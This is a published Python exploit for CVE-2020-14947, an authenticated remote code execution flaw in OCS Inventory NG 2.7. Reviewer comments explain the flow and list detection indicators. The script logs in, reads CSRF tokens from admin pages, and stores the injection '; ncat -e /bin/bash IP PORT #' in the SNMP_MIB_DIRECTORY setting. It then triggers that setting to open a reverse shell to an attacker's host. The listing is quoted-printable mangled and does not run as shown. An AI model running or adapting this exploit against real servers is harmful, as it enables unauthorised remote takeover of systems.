"OCS Inventory NG 2.7 - Remote Code Execution"


# Exploit Title: OCS Inventory NG 2.7 - Remote Code Execution
# Date: 2020-06-05
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2020-14947
# Vendor Homepage: https://ocsinventory-ng.org/
# Version: v2.7
# Tested on: Ubuntu 18.04 / PHP 7.2.24

#!/usr/bin/python3


import requests
import sys
import warnings
import random
import string
from bs4 import BeautifulSoup
from urllib.parse import quote

# NOTE(review): this listing is quoted-printable mangled as published here
# (`=3D` stands for `=`, a trailing `=` is a soft line break); the text as
# shown is not valid Python and the verifier cannot compile it as-is.
# Suppress bs4's UserWarning (e.g. its parser-choice notice) so it does not
# interleave with the "[+]" progress output below.
warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4')


# CLI contract: exactly five positional arguments after the script name.
# Anything else prints usage and exits; note this is the builtin exit(),
# not sys.exit(), so it relies on the site module being loaded.
if len(sys.argv) !=3D 6:
    print("[~] Usage : ./ocsng-exploit.py url username password ip port")
    exit()

url =3D sys.argv[1]        # base URL of the OCS console; "/index.php" is appended verbatim below
username =3D sys.argv[2]   # credentials for an account that can reach function=admin_conf
password =3D sys.argv[3]   # (presumably an administrator; the listing does not show the role check)
ip =3D sys.argv[4]         # listener address/port that get formatted into the SNMP_MIB_DIRECTORY value
port =3D sys.argv[5]

# One requests.Session so the cookie set by login() is reused by every later call.
request =3D requests.session()


def login() -> bool:
    """Authenticate the shared session against the OCS console login form.

    Posts the module-level ``username``/``password`` to ``/index.php`` and
    decides success purely by the absence of the "User not registered"
    marker in the response body.

    Returns:
        False if the marker is present, True otherwise. Any other body
        (error page, redirect page, a different application entirely) also
        yields True, so a True result is a weak signal, not proof of a
        valid session.

    Raises:
        requests.RequestException: transport failures are not caught here.
    """
    # Field names mirror the console's login form; Valid_CNX is the submit button.
    login_info =3D {
    "Valid_CNX": "Send",
    "LOGIN": username,
    "PASSWD": password
    }
    login_request =3D request.post(url+"/index.php", login_info)
    login_text =3D login_request.text
    # Only the explicit failure string is checked; see Returns above.
    if "User not registered" in login_text:
        return False
    else:
        return True


def inject_payload() -> None:
    """Store a shell-metacharacter string in the SNMP_MIB_DIRECTORY setting.

    Walks the admin configuration page in two steps, each guarded by a
    per-page CSRF hidden input that must be read back and echoed:
      1. GET function=admin_conf, read CSRF_10, POST it to switch to the
         SNMP tab.
      2. Read CSRF_14 from that response and POST the SNMP form with
         SNMP_MIB_DIRECTORY set to ``payload`` plus RELOAD_CONF/Valid=Update.
    On "Update done" it hands off to execute_payload(), which visits the
    page that consumes the stored value.

    Security context (CVE-2020-14947, authenticated): the value saved here is
    a configuration path, yet it is evidently passed to a shell by the
    application later — the vulnerable sink is not part of this listing.
    Mitigations are the vendor fix for this version, and keeping console
    accounts with access to admin_conf to a minimum; a stored
    SNMP_MIB_DIRECTORY containing ``;``, ``#`` or other shell metacharacters
    is a direct indicator in the application's configuration/database, and
    the POST to function=admin_conf with such a value is visible in web logs.

    Raises:
        IndexError: if the expected CSRF input (CSRF_10 / CSRF_14) is absent,
            e.g. when the session is not actually authenticated or the
            page layout differs from 2.7.
        requests.RequestException: transport failures are not caught.
    """
    csrf_req =3D request.get(url+"/index.php?function=3Dadmin_conf")
    content =3D csrf_req.text
    soup =3D BeautifulSoup(content, "lxml")
    # [0] assumes the input exists; an unauthenticated page raises IndexError here.
    first_token =3D soup.find_all("input", id=3D"CSRF_10")[0].get("value")
    print("[+] 1st token : %s" % first_token)
    # Tab switch INVENTORY -> SNMP; this yields the page carrying CSRF_14.
    first_data =3D {
    "CSRF_10": first_token,
    "onglet": "SNMP",
    "old_onglet": "INVENTORY"
    }
    req =3D request.post(url+"/index.php?function=3Dadmin_conf", data=3Dfir=
st_data)
    content2 =3D req.text
    soup2 =3D BeautifulSoup(content2, "lxml")
    second_token =3D soup2.find_all("input", id=3D"CSRF_14")[0].get("value"=
)
    print("[+] 2nd token : %s" % second_token)
    # The stored value: a leading ';' terminates whatever command precedes
    # the interpolated path, a trailing '#' comments out whatever follows.
    payload =3D "; ncat -e /bin/bash %s %s #" % (ip, port)
    # Remaining form fields of the SNMP tab; RELOAD_CONF + Valid=Update make
    # the server persist the settings.
    #RELOAD_CONF=3D&Valid=3DUpdate
    inject_request =3D {
    "CSRF_14": second_token,
    "onglet": "SNMP",
    "old_onglet": "SNMP",
    "SNMP": "0",
    "SNMP_INVENTORY_DIFF": "1",
    # The unvalidated configuration field that later reaches a shell.
    "SNMP_MIB_DIRECTORY": payload,
    "RELOAD_CONF": "",
    "Valid": "Update"
    }
    final_req =3D request.post(url+"/index.php?function=3Dadmin_conf", data=
=3Dinject_request)
    # Silent on any other response: no message, no return value, no retry.
    if "Update done" in final_req.text:
        print("[+] Payload injected successfully")
        execute_payload()


def execute_payload() -> None:
    """Visit the SNMP_config page so the stored SNMP_MIB_DIRECTORY value is consumed.

    Two more CSRF-guarded steps, this time as multipart/form-data (requests'
    ``files={name: (None, value)}`` form sends plain fields without a
    filename):
      1. GET function=SNMP_config, read CSRF_22, POST a tab switch
         SNMP_RULE -> SNMP_MIB.
      2. Read CSRF_26 from that response and POST update_snmp=send, which is
         the request that makes the application act on the stored path.

    Nothing about the outcome is checked: the final response is discarded,
    so the only feedback is whatever happens out-of-band. From a defensive
    view, the two POSTs to function=SNMP_config with onglet=SNMP_MIB
    immediately after an admin_conf update are the request pattern to look
    for, together with the web-server user spawning ncat/bash.

    Raises:
        IndexError: if CSRF_22 or CSRF_26 is not present in the page.
        requests.RequestException: transport failures are not caught.
    """
    csrf_req =3D request.get(url+"/index.php?function=3DSNMP_config")
    content =3D csrf_req.text
    soup =3D BeautifulSoup(content, "lxml")
    third_token =3D soup.find_all("input", id=3D"CSRF_22")[0].get("value")
    # Multipart tab switch; snmp_config_length is sent verbatim as "10".
    third_request =3D request.post(url+"/index.php?function=3DSNMP_config",=
 files=3D{
    'CSRF_22': (None, third_token),
    'onglet': (None, 'SNMP_MIB'),
    'old_onglet': (None, 'SNMP_RULE'),
    'snmp_config_length': (None, '10')
    })
    print("[+] 3rd token : %s" % third_token)
    third_request_text =3D third_request.text
    # `soup` is rebound to the SNMP_MIB tab's markup before the next lookup.
    soup =3D BeautifulSoup(third_request_text, "lxml")
    forth_token =3D soup.find_all("input", id=3D"CSRF_26")[0].get("value")
    print("[+] 4th token : %s" % forth_token)
    print("[+] Triggering payload ..")
    print("[+] Check your nc ;)")
    # Response of this request is never inspected.
    forth_request =3D request.post(url+"/index.php?function=3DSNMP_config",=
 files=3D{
    'CSRF_26': (None, forth_token),
    'onglet': (None, 'SNMP_MIB'),
    'old_onglet': (None, 'SNMP_MIB'),
    'update_snmp': (None, 'send')
    })



# Entry point: runs at import time (no __main__ guard). login() returning
# True only means the failure marker was absent, so "[+] Valid credentials!"
# can print against a non-OCS target; the IndexError in inject_payload()
# is then the first real sign that the session is not authenticated.
if login():
    print("[+] Valid credentials!")
    inject_payload()